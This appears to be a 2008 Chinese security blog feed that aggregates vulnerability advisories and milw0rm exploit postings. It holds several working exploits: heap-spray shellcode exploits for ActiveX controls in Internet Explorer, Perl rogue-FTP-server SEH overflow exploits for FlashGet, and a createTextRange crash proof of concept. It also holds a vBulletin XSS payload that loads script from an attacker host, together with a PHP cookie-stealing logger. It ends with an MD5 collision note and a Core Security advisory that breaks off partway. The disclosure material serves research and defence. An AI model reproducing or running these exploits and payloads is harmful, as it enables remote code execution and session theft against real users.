<![CDATA[QIMENG@NET@AN~SQL Injection Attack technology]]> zh-cn 2008-09-08T07:12:59Z hourly 1 2000-01-01T12:00+00:00 <![CDATA[Microsoft IE createTextRange方式内存破坏漏洞(MS08-045)]]> 更新日期:2008-08-19

受影响系统:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28295
CVE(CAN) ID: CVE-2008-2255

Internet Explorer是微软操作系统中所默认捆绑的WEB浏览器。

IE的createTextRange方式没有正确地验证HTML文档中的超长参数。攻击者可以通过构建特制的网页来利用该漏洞,当用户查看网页时,该漏洞可能允许远程执行代码。成功利用此漏洞的攻击者可以获得与登录用户相同的用户权限。

<*来源:Juan Pablo Lopez Yacubian (jplopezy@gmail.com)

链接:http://secunia.com/advisories/31375/
http://marc.info/?l=bugtraq&m=120585764805251&w=2
http://www.microsoft.com/technet/security/Bulletin/MS08-045.mspx?pf=true
http://www.us-cert.gov/cas/techalerts/TA08-225A.html
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<body>
<script language="JavaScript">
function function1() {
var myNode = document.body.createTextRange();
while(1)
myNode.text = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';
}
</script>
<button onclick="function1();">Ejecutar prueba</button>
</body>
</html>

建议:
--------------------------------------------------------------------------------
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 将Internet Explorer配置为在Internet和本地Intranet安全区域中运行ActiveX控件之前进行提示。

* 将Internet 和本地Intranet安全区域设置设为"高",以便在这些区域中运行ActiveX控件和活动脚本之前进行提示。

* 以纯文本格式阅读电子邮件可帮助保护您免受来自HTML电子邮件攻击媒介的攻击。

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS08-045)以及相应补丁:
MS08-045:Cumulative Security update for Internet Explorer (953838)
链接:http://www.microsoft.com/technet/security/Bulletin/MS08-045.mspx?pf=true

]]> 2008-08-28T21:34:37Z <![CDATA[vBulletin $newpm[title]参数跨站脚本漏洞]]> 更新日期:2008-08-22

受影响系统:
VBulletin VBulletin 3.7.2 PL1
VBulletin VBulletin 3.6.10 PL3
不受影响系统:
VBulletin VBulletin 3.7.2 PL2
VBulletin VBulletin 3.6.10 PL4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 30777

vBulletin是一款开放源代码的PHP论坛程序。

vBulletin论坛如果启用了Show New Private Message Notification Pop-Up选项的话,由于没有正确地过滤保密消息标题的输入便执行了存储,这可能导致注入任意HTML和脚本代码,并在浏览恶意数据时执行。

以下是有漏洞的代码段:

/-----------

<!--
// script to show new private message popup
if (confirm("You have a new private message.\n\nSender:
[SENDER_USERNAME]\nTitle: '[PRIVATE_MESSAGE_TITLE]'\n\nClick OK to view
it, or cancel to hide this prompt."))
{
// Output when OK is clicked
if (confirm("Open the message in a new window?\n\n(Press cancel to open
in the current window.)"))
{
var winobj =
window.open("private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]", "pmnew",
"statusbar=yes,menubar=yes,scrollbars=yes,toolbar=yes,location=yes,directories=yes,resizable=yes,top=50,left=50"); if (winobj == null)
{
alert("Unable to open a new browser window,\n This might be due to a
'popup blocker'");
}
}
else
{
window.location = "private.php?do=showpm&pmid=[PRIVATE_MESSAGE_ID]";
}
}
// end pm popup script
//-->

- -----------/

之前在global.php文件中取消了对install/vbulletin-style.xml中$newpm[title]变量的过滤,仅执行了斜线转义:

/-----------

//
#############################################################################
// get new private message popup
$shownewpm = false;
if ($vbulletin->userinfo['pmpopup'] == 2 AND
$vbulletin->options['checknewpm'] AND $vbulletin->userinfo['userid'] AND
!defined('NOPMPOPUP'))
{
$userdm =& datamanager_init('User', $vbulletin, ERRTYPE_SILENT);
$userdm->set_existing($vbulletin->userinfo);
$userdm->set('pmpopup', 1);
$userdm->save(true, 'pmpopup'); // 'pmpopup' tells db_update to issue a
shutdownquery of the same name
unset($userdm);

if (THIS_SCRIPT != 'private' AND THIS_SCRIPT != 'login')
{
$newpm = $db->query_first("
select pm.pmid, title, fromusername
FROM " . TABLE_PREFIX . "pmtext AS pmtext
LEFT join " . TABLE_PREFIX . "pm AS pm USING(pmtextid)
where pm.userid = " . $vbulletin->userinfo['userid'] . "
AND pm.folderid = 0
ORDER BY dateline DESC
LIMIT 1");

$newpm['username'] =
addslashes_js(unhtmlspecialchars($newpm['fromusername'], true), '"');
$newpm['title'] = addslashes_js(unhtmlspecialchars($newpm['title'],
true), '"');
$shownewpm = true;
}
}

- -----------/

这允许跨站脚本攻击。

<*来源:Federico Muttis

链接:http://secunia.com/advisories/31552/
http://www.vbulletin.com/forum/showthread.php?t=282133
http://marc.info/?l=bugtraq&m=121933258013788&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

- --></script><script>alert(/xss/.source)</script><!--
- --></script><script src="http:"//attacker/vbStealer/egg.js></script><!--

这里egg.js脚本为

// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==
//
// Using the first method described in
// http://www.securityfocus.com/archive/107/308433
//
// To bypass HttpOnly cookie restrictions - Works in IE 6 and lower

var XmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
XmlHttp.open("GET","http://victim/vbStealer/logger.php",false);
XmlHttp.setRequestHeader("Host","attacker");
XmlHttp.send();

logger.php脚本文件为

<?
// == XSS - Cookie stealing - vBulletin 3.7.2 PL1 ==

$all_cookies = "";
foreach ($_COOKIE as $cookie_name => $cookie_value) {
$all_cookies .= "$cookie_name=$cookie_value, ";
}
rtrim($all_cookies, ", ");
file_put_contents("iplog.txt", "COOKIES: ".$all_cookies."\n", FILE_APPEND);
?>

建议:
--------------------------------------------------------------------------------
厂商补丁:

VBulletin
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.vbulletin.com/

]]> 2008-08-28T21:32:04Z <![CDATA[Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit]]>
Author: Koshi
Original POC: http://www.milw0rm.com/exploits/6244 ( Not by me )

My first ActiveX exploit, learned quite a bit playing with this one.
Heaps are handy.

#################################################
Loaded File: C:\WINDOWS\system32\MSMASK32.OCX
Name: MSMask
Version: 1.1
Class MaskEdBox
GUID: {C932BA85-4374-101B-A56C-00AA003668DC}
Number of Interfaces: 1
Default Interface: IMSMask
RegKey Safe for Script: False
RegKey Safe for Init: True
KillBitSet: False
#################################################


gr33tz: Rima my baby, str0ke, mess, and to all of those who have helped me over the years!

<input language=JavaScript onclick=doIt() type=button value="Test Exploit">
<script language="JavaScript">

function doIt()
{
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC" width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf1 = '';
for (i=1;i<=1945;i++){buf1=buf1+unescape("%0c");}

// win32_exec - EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com

var shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4937%u4949%u4949%u4949%u4949" +
       "%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4130%u416b" +
       "%u5541%u4132%u3242%u4242%u4142%u4230%u5841%u3850%u4241%u7875" +
       "%u7969%u6d6c%u3038%u6544%u7550%u7350%u6e30%u516b%u7755%u4c4c" +
       "%u414b%u656c%u3355%u4348%u3831%u4c6f%u304b%u464f%u4c78%u314b" +
       "%u374f%u3450%u4a41%u624b%u4e69%u666b%u6e54%u666b%u6a61%u304e" +
       "%u3931%u4f50%u4c69%u6f6c%u5974%u3450%u3534%u5957%u7951%u565a" +
       "%u776d%u6f71%u7832%u6b6b%u6744%u714b%u6744%u7754%u3474%u4b35" +
       "%u6e55%u436b%u466f%u6544%u3851%u506b%u4c66%u564b%u306c%u4c4b" +
       "%u414b%u374f%u656c%u5a51%u6c4b%u654b%u4c4c%u674b%u6871%u6e6b" +
       "%u7169%u654c%u6674%u5964%u4653%u4951%u6550%u6c34%u634b%u3470" +
       "%u4b70%u4b35%u5470%u3438%u6e4c%u436b%u6670%u4e6c%u626b%u7550" +
       "%u4c4c%u6e6d%u536b%u3758%u4a78%u554b%u4c59%u6d4b%u6e50%u6550" +
       "%u6550%u4750%u6c70%u434b%u6558%u716c%u464f%u5a51%u4156%u3070" +
       "%u4d56%u6c59%u4e38%u4963%u7150%u526b%u7570%u7138%u4b6e%u4b68" +
       "%u3152%u6563%u4c38%u5958%u6e6e%u746a%u714e%u4b47%u7a4f%u7047" +
       "%u6363%u5251%u634c%u5553%u4550");


// A read through "Heap Feng Shui in JavaScript" shed some
// much needed light on this topic for me. Thank you Alexander Sotirov.
var shellcodeSize = (shellcode.length * 2);
var spraySled = unescape("%u9090%u9090");
var heapAddress = 0x0c0c0c0c;
var heapBlockSize = 0x100000;
var spraySledSize = heapBlockSize - (shellcodeSize + 1);
var heapBlocks = (heapAddress+heapBlockSize)/heapBlockSize;
var x = new Array();
while (spraySled.length*2<spraySledSize)
{
spraySled += spraySled;
}
spraySled = spraySled.substring(0,spraySledSize/2);
for (i=0;i<heapBlocks;i++)
{
x[i] = spraySled + shellcode;
}
document.write(body+buf1+body1);
}

</script>

# milw0rm.com [2008-08-26]

]]> 2008-08-28T21:24:34Z <![CDATA[Ultra Office ActiveX Control Remote Buffer Overflow Exploit]]> Ultra Office ActiveX Control Remote Buffer Overflow
url: http://www.ultrashareware.com

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.net

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<script language="JavaScript" defer>
var sCode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sSlide = unescape("%u9090%u9090");
var heapSA = 0x0c0c0c0c;
function tryMe()
{
var buffSize = 20000;
var x = unescape("%0c%0c%0c%0c");
while (x.length<buffSize) x += x;
x = x.substring(0,buffSize);
boom.HttpUpload(x, x, x);
}
function getsSlide(sSlide, sSlideSize)
{
while (sSlide.length*2<sSlideSize)
{
sSlide += sSlide;
}
sSlide = sSlide.substring(0,sSlideSize/2);
return (sSlide);
}
var heapBS = 0x400000;
var sizeHDM = 0x5;
var PLSize = (sCode.length * 2);
var sSlideSize = heapBS - (PLSize + sizeHDM);
var heapBlocks = (heapSA+heapBS)/heapBS;
var memory = new Array();
sSlide = getsSlide(sSlide,sSlideSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sSlide + sCode;
}
</script>
<body onload="JavaScript: return tryMe();">
<object id="boom" classid="clsid:00989888-BB72-4E31-A7C6-5F819C24D2F7">
Unable to create object
</object>

# milw0rm.com [2008-08-27]

]]> 2008-08-28T21:23:09Z <![CDATA[MD5已经不堪一击]]> http://www.cnbeta.com/articles/59117.htm

以后都用sha加密吧,至少要用sha256..

-------------------------------

原来我总是很自信地以为:你有本事找到 MD5 的碰撞又如何?你难道还有本事让两个可执行文件的 MD5 一样,却又都能正常运行,并且可以做完全不同的事情么?
答:还真的可以.


http://www.win.tue.nl/hashclash/SoftIntCodeSign/HelloWorld-colliding.exe

http://www.win.tue.nl/hashclash/SoftIntCodeSign/GoodbyeWorld-colliding.exe

这两个程序会在屏幕上打印出不同的字符,但是它们的 MD5 都是一样的。

通读其论文后摘要如下:

这几位密码学家使用的是"构造前缀碰撞法"(chosen-prefix collisions)来进行此次攻击(是王小云所使用的攻击方法的改进版本)。

他们所使用的计算机是一台 Sony PS3,且仅用了不到两天。

他们的结论:MD5 算法不应再被用于任何软件完整性检查或代码签名的用途。

另:现在,如果仅仅是想要生成 MD5 相同而内容不同的文件的话,在任何主流配置的电脑上用几秒钟就可以完成了。

这几位密码学家编写的"快速 MD5 碰撞生成器":http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5.exe.zip
源代码:http://www.win.tue.nl/hashclash/fastcoll_v1.0.0.5_source.zip

]]> 2008-08-18T20:53:36Z <![CDATA[FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)]]> # k`sOSe 08/17/2008
# bypass safeseh using flash9f.ocx.

use warnings;
use strict;
use IO::Socket;

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =  
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x08\xa3\x03\x10";


my $sock = IO::Socket::INET->new( LocalAddr => '0.0.0.0', LocalPort => '21', Listen => 1, Reuse => 1);

while(my $csock = $sock->accept())
{

  print $csock "220 Hello ;)\r\n";
  read_sock($csock);

  print $csock "331 pwd please\r\n";
  read_sock($csock);

  print $csock "230 OK\r\n";
  read_sock($csock);

  print $csock "250 CWD command successful.\r\n";
  read_sock($csock);

  print $csock  "257 " . "\x22"  .
      "\x41" x 324 .

      "\xEB\x06\x90\x90" . # jump ahead
      "\x82\x01\x02\x30" . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH ;)

      $shellcode .

      "\x90" x 840 .
      "\x22" .
      " is current directory.\r\n";
    
  close($csock);
  exit;
}


sub read_sock
{
  my ($sock) = @_;

  my $buf = <$sock>;

  print "[client] -> $buf";

}

# milw0rm.com [2008-08-17]

]]> 2008-08-18T20:26:50Z <![CDATA[FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit]]> # FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.

##
# PoC by Krystian Kloskowski (h07) <h07@interia.pl>
# http://milw0rm.com/exploits/6240

##
# special thanks to a friend of mine who helped me

use IO::Socket;

####################################[ Parameters ]########################################
my $SHELLCODE =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6b".
"\xa3\x03\x10\x83\xeb\xfc\xe2\xf4\x97\x4b\x47\x10\x6b\xa3\x88\x55".
"\x57\x28\x7f\x15\x13\xa2\xec\x9b\x24\xbb\x88\x4f\x4b\xa2\xe8\x59".
"\xe0\x97\x88\x11\x85\x92\xc3\x89\xc7\x27\xc3\x64\x6c\x62\xc9\x1d".
"\x6a\x61\xe8\xe4\x50\xf7\x27\x14\x1e\x46\x88\x4f\x4f\xa2\xe8\x76".
"\xe0\xaf\x48\x9b\x34\xbf\x02\xfb\xe0\xbf\x88\x11\x80\x2a\x5f\x34".
"\x6f\x60\x32\xd0\x0f\x28\x43\x20\xee\x63\x7b\x1c\xe0\xe3\x0f\x9b".
"\x1b\xbf\xae\x9b\x03\xab\xe8\x19\xe0\x23\xb3\x10\x6b\xa3\x88\x78".
"\x57\xfc\x32\xe6\x0b\xf5\x8a\xe8\xe8\x63\x78\x40\x03\x53\x89\x14".
"\x34\xcb\x9b\xee\xe1\xad\x54\xef\x8c\xc0\x62\x7c\x08\xa3\x03\x10";
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

# The Host that will be listen to the Download request from Flashget
my $HOST = '127.0.0.1'; #your own ip
#################################[Don't Edit From Here]#####################################


######################################[Defines]#############################################
my $PADDING_CHAR = "A";
my $PADDING_SIZE = 324;

#The code will return to next_seh_chain so i make it as jump and invalid address
#so it will be decoded as last in chain.
my $NEXT_SEH_IN_CHAIN = "\xEB\x06\xFF\xFF"; # JMP +6

#Settings Return Address
my $CUR_SEH_ADDRESS = "\x8B\x19\x01\x10";
# Chosen Ret Addr is : 0x1001198B FlashGet\FGBTCORE.dll v1.0. 0.36
# 1001198B 5E POP ESI
# 1001198C 5B POP EBX
# 1001198D C3 RETN

# Building SEH Block
my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN .
        $CUR_SEH_ADDRESS;

#Creating Payload
$PAYLOAD = $PADDING_CHAR x $PADDING_SIZE;    
$PAYLOAD .= $SEH_BLOCK;
$PAYLOAD .= $SHELLCODE;
$PAYLOAD .= "\x90" x 300;  #Putting alot of nops so the code will get Exception that we write after stack is over
              #witch will make it to call our code

$LISTEN_PORT = 21;
##########################################################################
print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit\r\n";
print "# Coded By SkOd, skod.uk\x40gmail\x2ecom\r\n";

my $serverSocket = new IO::Socket::INET (Listen => 1,
          LocalAddr => $HOST,
          LocalPort => $LISTEN_PORT,
          Proto => 'tcp');  
do
{
  print "\r\n[~] listening...\r\n";
  $clientSocket = $serverSocket->accept();
  print "[+] New Connection Recived\r\n";

  $clientSocket->send("220 WELCOME!\r\n");
  $isPayloadSent = 0;
  
  while($isPayloadSent == 0) {
    $clientSocket->recv($recvBuffer,1024);
      print "[~] Recived: " . $recvBuffer;
  
    if($recvBuffer =~ /USER/) {
      $clientSocket->send("331 Password required for l33t\r\n");
    } elsif($recvBuffer =~ /PASS/) {
      $clientSocket->send("230 User l33t logged in.\r\n");
    } else {
      $clientSocket->send("257 \"$PAYLOAD\"\r\n");
      print("[+] The payload has been sent...\r\n");
      $isPayloadSent = 1;
    }
  }
  
  $clientSocket->close();
  
} while (true);

# milw0rm.com [2008-08-15]

]]> 2008-08-18T20:25:19Z <![CDATA[Internet Explorer Zone Elevation Restrictions Bypass and Security Zone Restrictions Bypass]]> -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

~ Core Security Technologies - CoreLabs Advisory
~ http://www.coresecurity.com/corelabs/

Internet Explorer Zone Elevation Restrictions Bypass and Security Zone
Restrictions Bypass

*Advisory Information*

Title: Internet Explorer Zone Elevation Restrictions Bypass and Security
Zone Restrictions Bypass
Advisory ID: CORE-2008-0103
Advisory URL:
http://www.coresecurity.com/content/internet-explorer-zone-elevation
Date published: 2008-08-13
Date of last update: 2008-08-13
Vendors contacted: Microsoft
Release mode: Coordinated release

*Vulnerability Information*

Class: Zone Elevation Restrictions Bypass and Security Zone Restrictions
Bypass
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 30585
CVE Name: CVE-2008-1448

*Vulnerability Description*

Internet Explorer introduces the concept of URL Security Zones, which
basically define a set of privileges for web applications (such as, for
example, accessing and/or modifying the local computer files) depending
on their level of trustworthiness.

Issues have been found in the way that security policies are applied
when a URI is specified in the UNC form:
'\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE'

* When a remote site attempts to access a local resource, Internet
Explorer will fail to enforce the Zone Elevation restrictions.

* When browsing a remote site, Internet Explorer will not apply the
right Security Zone permissions, allowing a site belonging to a less
secure zone to be treated as one belonging to a more privileged zone.

*Vulnerable Packages*

. Internet Explorer 5 under Windows 2000/2003/XP
. Internet Explorer 6 under Windows 2000/2003/XP
. Internet Explorer 7 under Windows 2000/2003/XP
. Internet Explorer 7 under Windows Vista (when protected mode is turned
off)

*Non-vulnerable Packages*

. This vulnerability is addressed by Microsoft Security Bulletin
MS08-048 [1]

*Vendor Information, Solutions and Workarounds*

Microsoft has issued Security Bulletin MS08-048 to address this
vulnerability. The bulletin includes workarounds and mitigating factors.
For more information refer to the bulletin:
http://www.microsoft.com/technet/security/bulletin/ms08-048.mspx

Workarounds communicated by the vendor include:

* Locking down the MHTML protocol handler. Below are the required
registry changes.

/-----------

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet
Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN]
"explorer.exe"=dword:00000001
"iexplore.exe"=dword:00000001
"*"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols\1]
"mhtml"="mhtml"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols\2]
"mhtml"="mhtml"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols\3]
"mhtml"="mhtml"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet
Settings\RestrictedProtocols\4]
"mhtml"="mhtml"

- -----------/

* Disabling the MHTML protocol handler. To disable the protocol handler,
follow these steps:

1. Click Start and then click Run. Enter regedit.exe in the text box and
click OK.
2. Navigate to
HKEY_CLASSES_ROOT\CLSID\{05300401-BCBC-11d0-85E3-00C04FD85AB4}.
3. Right click {05300401-BCBC-11d0-85E3-00C04FD85AB4} and select
Permissions.
4. Click Advanced.
5. Deselect Allow inheritable permissions from the parent to propagate
6. Click Remove, and then click OK. Click Yes and OK on subsequent screens.

*Credits*

This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Technologies.

*Technical Description / Proof of Concept Code*

Internet Explorer is the most popular Internet browser in the world as
it is an integrated component of every Windows installation. It
introduces the concept of URL Security Zones, as explained in [2], which
basically define a set of privileges for web applications (such as
accessing and modifying the local computer files) depending on their
level of trustworthiness, namely:

* Local Intranet Zone: for content located on an organization's
intranet. Because the servers and information are within an
organization's firewall, it is reasonable to assign a higher level of
trust to content on the intranet.

* Trusted Sites Zone: for content located on Web sites that are
considered more reputable or trustworthy than other sites on the
Internet. Assigning a higher level of trust to these sites minimizes the
number of related authentication requests. The user adds the URLs of
trusted Web sites to this zone.

* Internet Zone: for Web sites on the Internet that do not belong to
another zone. This default setting causes Internet Explorer to prompt
the user whenever potentially unsafe content is about to be downloaded.
Web sites that are not mapped into other zones automatically fall into
this zone.

* Restricted Sites Zone: used for Web sites that contain content that
can cause (or have previously caused) problems when downloaded. This
zone causes Internet Explorer to alert users when potentially-unsafe
content is about to be downloaded, or to prevent the content from
downloading. The user adds the URLs of these un-trusted Web sites to
this zone.

* Local Machine Zone: the Local Machine zone is an implicit zone for
content that exists on the local computer. The content found on the
user's computer (except for content that Internet Explorer caches on the
local system) is treated with a high level of trust.

THE PROBLEM

There are issues in the manner that security policies are applied when a
URI is specified in the UNC form:

\\MACHINE_NAME_OR_IP\PATH_TO_RESOURCE

* When a remote site attempts to access a local resource, Internet
Explorer will fail to enforce the Zone Elevation restrictions.

* When browsing a remote site, Internet Explorer will fail to apply the
right Security Zone permissions, allowing a site belonging to a less
secure zone to be treated as one belonging to a more privileged zone.

TECHNICAL BACKGROUND

The Proof of Concepts below exploit the aforementioned issue by taking
advantage of other features of Internet Explorer. Keep in mind that:

* Besides the common web content types (such as plain http, image, audio
and video) the browser is also able to render other standardized content
types, among them, MIME HTML or mhtml. And, overriding the way IE
chooses to render a file (described in [3]) presents a way to enforce
the rendering type as MIME HTML by using the protocol handler for mhtml
in the following manner:

mhtml:[PATH_TO_RESOURCE]

The resource content begins with the MIME HTML headers describing their
contents, as shown below.

/-----------

~ From: <wherever the contents where from>
~ Subject: <whatever>
~ Date: <whatever>
~ MIME-Version: 1.0
~ Content-Type: multipart/related;
~ type="text/html";
~ boundary="----=_NextPart_000_0000_01C8457B.CB7FBF60"
~ X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3028

~ [FILE CONTENTS]

- -----------/

But, in fact, the only header lines required for the file being rendered
as mhtml, are:

/-----------

Content-Type: <file content type>

[FILE CONTENTS]

- -----------/

Cookies are stored in independent text files (one for each domain)
inside the cookies folder (usually located at '\Documents and
settings\USERNAME\Cookies' in all Windows NT based implementations). The
cookie file name is structured in the following manner:

/-----------

USERNAME (at) full.domain (dot) name [email concealed][X]

- -----------/

where X is an integer like 1,2,3, depending on the Internet Explorer
choice.

The cookies folder is hardcoded inside the Explorer engine as a
restricted site. You can check it by looking at the status bar when
browsing this folder with Windows Explorer.

When requesting a resource, for example, in the 'src' attribute of an
HTML 'img' tag, Internet Explorer allows the usage of 'smb' URIs. So,
when IE attempts to render the following line:

/-----------

<img src="file://IP_OR_HOSTNAME/PATH_TO_RESOURCE">

- -----------/

It will attempt to establish an SMB connection against the
IP_OR_HOSTNAME machine, using the port 445. If this communication is
allowed, the username and a ciphered challenge/response will be sent to
the IP_OR_HOSTNAME specified.

Internet Explorer reacts different when a requested resource is directly
accessed or when it's found after a redirection. If a page hosted in
domain A makes a reference to a resource located at domain B, the user
will be prompted to download this file from the B domain. But if the
resource is requested, for example, in the following way:

/-----------

<img src=A/resource.pl>

- -----------/

And the resource.pl contents are something like:

/-----------

Status: 302 Found
Location: B/realResource

- -----------/

Internet Explorer will download the B/realResource file transparently.
Of course, in both cases, the security policies assigned to each domain
will be applied.

